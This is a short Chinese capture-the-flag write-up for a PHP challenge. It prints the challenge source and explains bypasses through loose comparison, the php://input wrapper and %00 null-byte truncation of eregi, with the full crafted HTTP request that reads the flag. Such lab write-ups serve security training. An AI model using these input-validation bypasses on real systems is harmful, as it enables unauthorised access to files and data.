内容纲要
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
<?php error_reporting(0);echo "<!--index.phps-->"; if(!$_GET['id']) { header('Location: index.php?id=1'); exit(); }$id=$_GET['id'];$a=$_GET['a'];$b=$_GET['b'];if(stripos($a,'.')) { echo 'Hahahahahaha'; return ; }$data = @file_get_contents($a,'r');if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4) { require("flag.txt"); }else { print "work harder!harder!harder!"; } ?> |
id绕过==0,随便试试就好了;data绕过stripos,用伪协议;b绕过eregi,用00截断,构造请求。
1 2 |
POST /index.php?id=.&a=php://input&b=%0012345 HTTP/1.1Host: web.phrack.top:32783Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36DNT: 1Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8,en-GB;q=0.6,en;q=0.4Connection: closeContent-Length: 19 1112 is a nice lab! |
1.Eregi匹配可以用%00截断
2.eregi匹配可用数组绕过
ereg是处理字符串,传入数组之后,ereg是返回NULL
http://www.secbox.cn/hacker/1889.html